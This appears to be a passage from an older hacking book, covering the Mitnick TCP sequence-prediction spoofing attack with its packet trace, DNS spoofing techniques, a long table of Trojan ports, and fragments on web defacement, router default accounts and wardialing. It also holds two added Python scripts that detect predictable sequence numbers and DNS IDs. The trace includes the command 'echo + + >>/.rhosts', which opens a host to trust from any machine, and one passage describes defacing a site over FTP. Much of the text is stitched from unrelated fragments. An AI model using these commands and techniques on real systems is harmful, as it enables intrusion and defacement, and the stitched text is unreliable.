1382726998:1382726998(0) win 4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack 1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win 0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win 4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack 1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win 0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win 4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack 1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win 0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win 4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack 1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win 0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win 4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack 1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win 0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win 4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack 1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win 0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win 4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack 1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win 0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win 4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack 1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1382727010:1382727010(0) win 0

Next we witness the forged connection requests from the masqueraded server (login) to the X-terminal, with the sequencing predicted by the attacker. This is based on the previous discovery of the X-terminal's TCP sequencing. With this spoof, the attacker (in this case, Mitnick) has control of communication to x-terminal.shell, masqueraded as coming from server.login:

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096
14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096
14:18:37 server# rsh x-terminal "echo + + >>/.rhosts"
14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096

Then the connections are reset, to empty the connection queue for server.login so that connections may be accepted once again:

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096
14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096
14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096
14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096
14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096
14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096
14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096
14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096
14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096
14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096
14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096
14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096
14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096
14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096
14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096
14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096
14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096
14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096
14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096
14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096
14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096
14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096
14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096
14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096
14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096
14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096

Figure 8.18 Windows IP Spoofer.

Soon after gaining root access from IP address spoofing, Mitnick compiled a kernel module that was forced onto an existing STREAMS stack, and which was intended to take control of a tty device. Typically, after completing a compromising attack, the hacker will compile a backdoor into the system that will allow easier future intrusions and remote control. Theoretically, IP spoofing is possible because trusted services rely only on network address-based authentication.
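The trace above contains the two artifacts an analyst reviewing such a capture should be able to pull out mechanically: the target's initial sequence number advancing by a fixed amount on every probe connection (which is what made the forgery possible), and a session in which one side sends ACKs and data while not a single packet from the other side appears. The following script is an added example, not code from the book; it parses tcpdump lines in the old format printed above (sample lines are copied from the trace) and reports both indicators. The function names and the flow-keying scheme are my own.

```python
import re
from collections import defaultdict

# Constructed sample: a few lines copied from the trace above (three of the
# SYN / SYN-ACK / RST probes and the start of the one-sided forged session).
SAMPLE_TRACE = """\
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win 0
14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096
14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
"""

# Old-style tcpdump TCP record: time  src.port > dst.port: flags [seq:end(len)] [ack N] win W
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) (?P<src>\S+) > (?P<dst>\S+): "
    r"(?P<flags>[SRPF.]+)(?: (?P<seq>\d+):(?P<end>\d+)\((?P<len>\d+)\))?"
    r"(?: ack (?P<ack>\d+))? win (?P<win>\d+)"
)


def parse_line(line):
    """Return one packet as a dict, or None for lines that are not TCP records
    (for example the shell-prompt annotation interleaved in the trace)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src_host, src_port = m["src"].rsplit(".", 1)   # "apollo.it.luc.edu.991" -> host, port
    dst_host, dst_port = m["dst"].rsplit(".", 1)
    return {"ts": m["ts"], "src": src_host, "sport": src_port,
            "dst": dst_host, "dport": dst_port, "flags": m["flags"],
            "seq": int(m["seq"]) if m["seq"] else None,
            "ack": int(m["ack"]) if m["ack"] else None}


def parse_trace(text):
    return [p for p in map(parse_line, text.splitlines()) if p]


def isn_probe_report(packets, target_port="shell"):
    """Measure how the target's initial sequence number (the seq of each SYN/ACK
    it sends) moves between consecutive connections. A constant step means the
    ISN is predictable, which is the precondition for the forged session."""
    synacks = [p for p in packets
               if p["sport"] == target_port and p["flags"] == "S" and p["ack"] is not None]
    isns = [p["seq"] for p in synacks]
    steps = [b - a for a, b in zip(isns, isns[1:])]
    # The prober tears each probe down with an immediate RST instead of completing it.
    rst_closed = sum(
        1 for p in synacks
        if any(q["flags"] == "R" and q["src"] == p["dst"] and q["sport"] == p["dport"]
               and q["dst"] == p["src"] and q["dport"] == p["sport"] for q in packets))
    return {"probes": len(synacks), "rst_closed": rst_closed, "isn_steps": steps,
            "predictable": bool(steps) and len(set(steps)) == 1}


def one_sided_sessions(packets):
    """Flows in which one side ACKs and pushes data while no packet from the
    other side appears anywhere in the capture: the signature of a blind
    spoofed connection, whose real replies go to the impersonated host."""
    flows = defaultdict(list)
    answered = set()
    for p in packets:
        flows[(p["src"], p["sport"], p["dst"], p["dport"])].append(p)
        answered.add((p["dst"], p["dport"], p["src"], p["sport"]))  # reverse direction seen
    findings = []
    for key, pkts in flows.items():
        if key in answered:
            continue
        if any(p["ack"] is not None for p in pkts) and any(p["flags"] == "P" for p in pkts):
            findings.append({"client": f"{key[0]}.{key[1]}",
                             "server": f"{key[2]}.{key[3]}", "packets": len(pkts)})
    return findings


if __name__ == "__main__":
    pkts = parse_trace(SAMPLE_TRACE)
    print(isn_probe_report(pkts))   # three probes, ISN step 128000 each time
    print(one_sided_sessions(pkts))  # server.login -> x-terminal.shell never answered
```

Run against the sample, the report shows three RST-closed probes with an ISN stride of 128000 between them, and flags the server.login to x-terminal.shell flow as never answered. On a live sensor the same two checks (a service whose ISN moves by a fixed amount per connection, and a data-carrying flow with no return packets) are what an IDS rule for this class of attack reduces to.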
Common spoofing software for PC-DOS includes Command IP Spoofer, IP Spoofer (illustrated in Figure 8.18) and Domain WinSpoof; Erect is frequently used for UNIX systems.

Recently, much effort has been expended investigating DNS spoofing. Spoofing DNS caching servers enables the attacker to forward visitors to some location other than the intended Web site. Recall that a domain name is a character-based handle that identifies one or more IP addresses. The Domain Name Service (DNS) translates these domain names back into their respective IP addresses. (This service exists for the simple reason that alphabetic domain names are easier to remember than IP addresses.) Also recall that datagrams that travel through the Internet use addresses; therefore, every time a domain name is specified, a DNS service daemon must translate the name into the corresponding IP address. Basically, by entering a domain name into a browser, say, TigerTools.net, a DNS server maps this alphabetic domain name into an IP address, which is where you are forwarded to view the Web site.

Using this form of spoofing, an attacker forces a DNS “client” to generate a request to a “server,” then spoofs the response from the “server.” One of the reasons this works is that most DNS servers support “recursive” queries. Fundamentally, you can send a request to any DNS server, asking it to perform a name-to-address translation. To meet the request, that DNS server will send the proper queries to the proper servers to discover this information. Hacking techniques, however, enable an intruder to predict what request the victim server will send out, and hence to spoof the response by inserting a fallacious Web site. When executed successfully, the spoofed reply arrives before the actual response. This is useful to hackers because DNS servers “cache” information for a specified amount of time.
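A forged reply only wins the race described above if the resolver accepts it as the answer to its outstanding query, and the field it matches on is the 16-bit transaction ID in the DNS header. The script below is an added example (not from the book) that a defender can use to audit a resolver's outgoing queries: it builds constructed query packets, decodes the fixed header, and checks whether the IDs a resolver emits move by a constant step (as a counter-based implementation would) or show no pattern. The packet builder, the `audit_capture` helper and the sample ID values are my own assumptions; the header layout is the standard 12-byte DNS header.

```python
import secrets
import struct


def build_query(ident, name, qtype=1):
    """Build a minimal DNS query: header (flags 0x0100 = standard query,
    recursion desired) plus one question of the given type, class IN."""
    header = struct.pack(">HHHHHH", ident, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack(">HH", qtype, 1)


def parse_header(packet):
    """Decode the fixed 12-byte DNS header; reject truncated input."""
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    ident, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", packet[:12])
    return {"id": ident, "is_response": bool(flags & 0x8000),
            "rd": bool(flags & 0x0100), "qdcount": qd, "ancount": an,
            "nscount": ns, "arcount": ar}


def id_predictability(ids):
    """Classify a sequence of observed query IDs. A constant step between
    consecutive queries (taken mod 2^16 so the wrap at 0xFFFF is handled)
    means one observed query reveals the ID of the next; random IDs show
    no constant step."""
    steps = [(b - a) % 65536 for a, b in zip(ids, ids[1:])]
    if len(steps) < 2:
        return {"samples": len(ids), "steps": steps, "verdict": "insufficient data"}
    distinct = len(set(steps))
    verdict = "sequential (predictable)" if distinct == 1 else "no constant step"
    return {"samples": len(ids), "steps": steps, "distinct_steps": distinct,
            "verdict": verdict}


def audit_capture(packets):
    """Take the IDs of the queries (not responses) in a capture and classify them."""
    ids = [h["id"] for h in map(parse_header, packets) if not h["is_response"]]
    return id_predictability(ids)


def fresh_id():
    """Mitigation on the resolver side: draw the ID from a CSPRNG, not a counter."""
    return secrets.randbelow(65536)


# Constructed samples (assumed values): a resolver whose IDs count up by one,
# and one whose IDs carry no pattern.
SEQUENTIAL_CAPTURE = [build_query(i, "www.example.com")
                      for i in (0x1000, 0x1001, 0x1002, 0x1003)]
RANDOM_CAPTURE = [build_query(i, "www.example.com")
                  for i in (0x3A7F, 0x9C02, 0x0B51, 0xE8D4)]

if __name__ == "__main__":
    print(audit_capture(SEQUENTIAL_CAPTURE))  # verdict: sequential (predictable)
    print(audit_capture(RANDOM_CAPTURE))      # verdict: no constant step
```

The verdict is only half the picture: even a perfectly random 16-bit ID leaves a 1-in-65536 chance per forged packet, which is why later resolvers also randomize the UDP source port of each query so that a forger has to match both values.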
If an intruder can successfully spoof a response for, say, www.yahoo.com, any legitimate users of that DNS server will then be redirected to the intruder’s site.

Johannes Erdfelt, a security specialist and hacker enthusiast, has divided DNS spoofing into three conventional techniques:

• Technique 1: DNS caching with additional unrelated data. This is the original and most widely used attack for DNS spoofing on IRC servers. The attacker runs a hacked DNS server in order to get a victim domain delegated to him or her. A query about the victim domain is sent to the target DNS server. When the query eventually traverses to the hacked DNS server, it replies, placing bogus data to be cached in the Answer, Authority, or Additional sections.
• Technique 2: DNS caching by related data. With this variation, hackers use the methodology in technique 1, but modify the reply information to be related to the original query (e.g., if the original query was my.antispoof.site.com, they will insert an MX, CNAME, or NS record for, say, my.antispoof.site.com, pointing to bogus information to be cached).
• Technique 3: DNS ID prediction. Each DNS packet has a 16-bit ID number associated with it, used to determine what the original query was. In the case of the renowned DNS daemon, BIND, this number increases by 1 for each query. A prediction attack can be initiated here: basically a race condition to respond before the correct DNS server does.

Trojan Infection

A Trojan can be defined as a malicious, security-breaking program that is typically disguised as something useful, such as a utility program, joke, or game download. As described in earlier chapters, Trojans are often used to integrate a backdoor, or “hole,” into a system’s security posture. Currently, the spread of Trojan infections is the result of the technological necessity to use ports. Table 8.1 lists the most popular extant Trojans and the ports they use.
Note that the lower ports are often used by Trojans that steal passwords, either by emailing them to attackers or by hiding them in FTP directories. The higher ports are often used by remote-access Trojans that can be reached over the Internet, network, VPN, or dial-up access.

Table 8.1 Common Ports and Trojans

PORT NUMBER           TROJAN NAME
port 21               Back Construction, Blade Runner, Doly Trojan, Fore, FTP Trojan, Invisible FTP, Larva, WebEx, WinCrash, lamer_FTP
port 25               Ajan, Antigen, Email Password Sender, Haebu Coceda (= Naebi), Happy 99, Kuang2, ProMail Trojan, Shtrilitz, lamer_SMTP, Stealth, Tapiras, Terminator, WinPC, WinSpy
port 31               Agent 31, Hackers Paradise, Masters Paradise
port 41               DeepThroat 1.0-3.1 + Mod (Foreplay)
port 48               DRAT v 1.0-3.0b
port 50               DRAT
port 59               DMSetup
port 79               Firehotker
port 80               Executor, RingZero
port 99               Hidden Port
port 110              ProMail Trojan
port 113              Kazimas
port 119              Happy 99
port 121              JammerKillah
port 137              NetBIOS Name (DoS attack)
port 138              NetBIOS Datagram (DoS attack)
port 139 (TCP)        NetBIOS session (DoS attacks)
port 139 (UDP)        NetBIOS session (DoS attacks)
port 146 (TCP)        Infector 1.3
port 421 (TCP)        Wrappers
port 456 (TCP)        Hackers Paradise
port 531 (TCP)        Rasmin
port 555 (UDP)        Ini-Killer, NeTAdmin, Phase Zero, Stealth Spy
port 555 (TCP)        Phase Zero
port 666 (UDP)        Attack FTP, Back Construction, Cain & Abel, Satanz Backdoor, ServeU, Shadow Phyre
port 911              Dark Shadow
port 999              DeepThroat, WinSatan
port 1001 (UDP)       Silencer, WebEx
port 1010             Doly Trojan 1.1-1.7 (SE)
port 1011             Doly Trojan
port 1012             Doly Trojan
port 1015             Doly Trojan
port 1024             NetSpy 1.0-2.0
port 1042 (TCP)       BLA 1.0-2.0
port 1045 (TCP)       Rasmin
port 1090 (TCP)       Xtreme
port 1170 (TCP)       Psyber Stream Server, Streaming Audio Trojan, Voice
port 1234 (UDP)       Ultors Trojan
port 1243 (TCP)       BackDoor-G, SubSeven, SubSeven Apocalypse
port 1245 (UDP)       VooDoo Doll
port 1269 (TCP)       Mavericks Matrix
port 1349 (UDP)       BO DLL
port 1492 (TCP)       FTP99CMP
port 1509 (TCP)       Psyber Streaming Server
port 1600 (TCP)       Shivka-Burka
port 1807 (UDP)       Spy-Sender
port 1981 (TCP)       Shockrave
port 1999             BackDoor 2.00 - 2.03
port 1999 (TCP)       TransScout
port 2000             TransScout
port 2001 (TCP)       Trojan Cow 1.0
port 2001             TransScout, Transmission Scout v1.1 - 1.2, Der Spaeher 3, Der Spaeher v3.0
port 2002             TransScout
port 2003             TransScout
port 2004             TransScout
port 2005             TransScout
port 2023 (TCP)       Ripper
port 2086 (TCP)       Netscape/Corba exploit
port 2115 (UDP)       Bugs
port 2140 (UDP)       Deep Throat v1.3 server, Deep Throat 1.3 KeyLogger
port 2140 (TCP)       The Invasor, Deep Throat v2.0
port 2155 (TCP)       Illusion Mailer
port 2283 (TCP)       HVL Rat 5.30
port 2400             PortD
port 2565 (TCP)       Striker
port 2567 (TCP)       Lamer Killer
port 2568 (TCP)       Lamer Killer
port 2569 (TCP)       Lamer Killer
port 2583 (TCP)       WinCrash2
port 2600             Digital RootBeer
port 2801 (TCP)       Phineas Phucker
port 2989 (UDP)       RAT
port 3024 (UDP)       WinCrash 1.03
port 3128             RingZero
port 3129             Masters Paradise 9.x
port 3150 (UDP)       Deep Throat, The Invasor
port 3459             Eclipse 2000
port 3700 (UDP)       Portal of Doom
port 3791 (TCP)       Total Eclypse
port 3801 (UDP)       Eclypse 1.0
port 4092 (UDP)       WinCrash-alt
port 4321             BoBo 1.0 - 2.0
port 4567 (TCP)       File Nail
port 4590 (TCP)       ICQ-Trojan
port 5000 (UDP)       Bubbel, Back Door Setup, Sockets de Troie/socket23
port 5001 (UDP)       Back Door Setup, Sockets de Troie/socket23
port 5011 (TCP)       One of the Last Trojans (OOTLT)
port 5031 (TCP)       Net Metropolitan
port 5321 (UDP)       Firehotker
port 5400 (UDP)       Blade Runner, Back Construction
port 5401 (UDP)       Blade Runner, Back Construction
port 5402 (UDP)       Blade Runner, Back Construction
port 5521 (TCP)       Illusion Mailer
port 5550 (TCP)       Xtcp 2.0 - 2.1
port 5550 (TCP)       X-TCP Trojan
port 5555 (TCP)       ServeMe
port 5556 (TCP)       BO Facil
port 5557 (TCP)       BO Facil
port 5569 (TCP)       Robo-Hack
port 5571 (TCP)       Lamer variation
port 5742 (UDP)       WinCrash
port 6400 (TCP)       The Thing
port 6669 (TCP)       Vampire 1.0 - 1.2
port 6670 (TCP)       DeepThroat
port 6683 (UDP)       DeltaSource v0.5 - 0.7
port 6771 (TCP)       DeepThroat
port 6776 (TCP)       BackDoor-G, SubSeven
port 6838 (UDP)       Mstream (Attacker to handler)
port 6912             Shit Heep
port 6939 (TCP)       Indoctrination 0.1 - 0.11
port 6969             GateCrasher, Priority, IRC 3
port 6970             GateCrasher 1.0 - 1.2
port 7000 (UDP)       Remote Grab, Kazimas
port 7300 (UDP)       NetMonitor
port 7301 (UDP)       NetMonitor
port 7302 (UDP)       NetMonitor
port 7303 (UDP)       NetMonitor
port 7304 (UDP)       NetMonitor
port 7305 (UDP)       NetMonitor
port 7306 (UDP)       NetMonitor
port 7307 (UDP)       NetMonitor
port 7308 (UDP)       NetMonitor
port 7789 (UDP)       Back Door Setup, ICKiller
port 8080             RingZero
port 8989             Recon, recon2, xcon
port 9090             Tst2, telnet server
port 9400             InCommand 1.0 - 1.4
port 9872 (TCP)       Portal of Doom
port 9873             Portal of Doom
port 9874             Portal of Doom
port 9875             Portal of Doom
port 9876             Cyber Attacker
port 9878             TransScout
port 9989 (TCP)       iNi-Killer 2.0 - 3.0
port 9999 (TCP)       theprayer1
port 10067 (UDP)      Portal of Doom
port 10101            BrainSpy Vbeta
port 10167 (UDP)      Portal of Doom
port 10520            Acid Shivers + LMacid
port 10607 (TCP)      Coma 1.09
port 10666 (TCP)      Ambush
port 11000 (TCP)      Senna Spy
port 11223 (TCP)      Progenic trojan 1.0 - 1.3
port 12076 (TCP)      Gjammer
port 12223 (UDP)      Hack 99 KeyLogger
port 12223 (TCP)      Hack 99
port 12345 (UDP)      GabanBus, NetBus, Pie Bill Gates, X-bill
[...]

...exchange e-messages.

Gateways interconnect networks and are categorized according to their OSI model layer of operation; for example, repeaters at Physical Layer 1, bridges at Data Link Layer 2, routers at Network Layer 3, and so on. This section describes vulnerability hacking secrets for common gateways that function primarily as access routers, operating at Network Layer 4. A router that connects any...
...that many of today’s newbies are headed down a path to nowhere. Hacking is not about defacing a Web page, nor about making a name for yourself. Hacking is about many different things: learning about new operating systems, learning programming languages, learning as much as you can about as many things as you can. [To do that you have to] immerse yourself in a pool of technical data, get some good books; install Linux or *BSD. Learn; learn everything you can. Life is short; don’t waste your time...

...Neither the author nor the publisher will be held accountable for the use or misuse of the information contained in this book.

Gateways and Routers

Fundamentally, a gateway is a network point that acts as a doorway between multiple networks. In a company network, for example, a proxy server may act as a gateway between the internal network and the Internet. By the same token, an SMTP gateway would allow users...

...
port 60000            Deep Throat
port 60068            Xzip 6000068
port 61348 (TCP)      Bunker-Hill Trojan
port 61466 (TCP)      Telecommando
port 61603 (TCP)      Bunker-Hill Trojan
port 63485 (TCP)      Bunker-Hill Trojan
port 65000 (UDP)      Devil v1.3
port 65000 (TCP)      Devil, stacheldraht, lamer variation
port 65432            The Traitor
port 65432 (UDP)      The Traitor
port 65535            RC, ICE

Another problem with remote-access or password-stealing Trojans is that...

...how_many ]\n", name); exit(0); }

HiPer ARC Card Login

Synopsis: The HiPer ARC card establishes a potential weakness with the default adm account.
Hack State: Unauthorized access.
Vulnerabilities: HiPer ARC card v4.1.x revisions.
Breach: The software that 3Com has developed for the HiPer ARC card (v4.1.x revisions) poses potential security threats. After uploading the software, there will be a login account...

...host programs, the viral code executes, then replicates. Typically, computer viruses that hackers spread tend to carry a payload, that is, the damage that will result after a specified period of time. The damage can range from file corruption or data loss to hard disk obliteration. Viruses are most often distributed through email attachments, pirate software distribution, and infected...

...when targeting a Web page hack is to steal passwords. If a hacker cannot successfully install a remote-control daemon to gain access to modify Web pages, he or she will typically attempt to obtain login passwords using one of the following methods:

• FTP hacking
• Telnet hacking
• Password-stealing Trojans
• Social engineering (swindling)
• Breach of HTTP administration front ends
• Exploitation...

...Web Hack. After we log in via FTP with admin rights and locate the target Web page file (in this case, index.html), we’ll download the file, make our changes with any standard Web-authoring tool, and upload the new hacked version (see Figure 8.26). To conclude this section as it began, from the hacker’s point of view, the following is a Web hack prediction from Underground hacker team H4G1S members, after...

...feature-rich dialing tools available today, hence is in widespread use among wardialers. The software is really a successor to Toneloc, and is referred to as the Hacker’s Choice (THC) scanner, developed by the infamous van Hauser (president of the Hacker’s Choice). THC-Scan brought new and useful functionality to the wardialing arena (it automatically detects speed, data bits, parity, and stop bits of discovered...

...look at the hacker’s world. I’ve been part of the “hacking scene” for around four years now, and I’m disgusted by what some so-called hackers are doing these days. Groups with names like “milw0rm” and “Dist0rt” think that hacking is about defacing Web pages and destroying Web sites. These childish little punks start stupid little “cyber wars” between their groups of crackers. They brag about their hacking...

...
(TCP)                 Hack a Tack 1.0 - 2000
port 31787 (TCP)      Hack a Tack
port 31788 (TCP)      Hack a Tack
port 31789 (UDP)      Hack a Tack
port 31791 (UDP)      Hack a Tack
port 31792 (UDP)      Hack a Tack
port...

...
port 12346 (TCP)      GabanBus, NetBus, X-bill
port 12361 (TCP)      Whack-a-mole
port 12362 (TCP)      Whack-a-mole
port 12631            WhackJob
port 13000            Senna Spy Lamer
port 16660 (TCP)      stacheldraht
port 16969...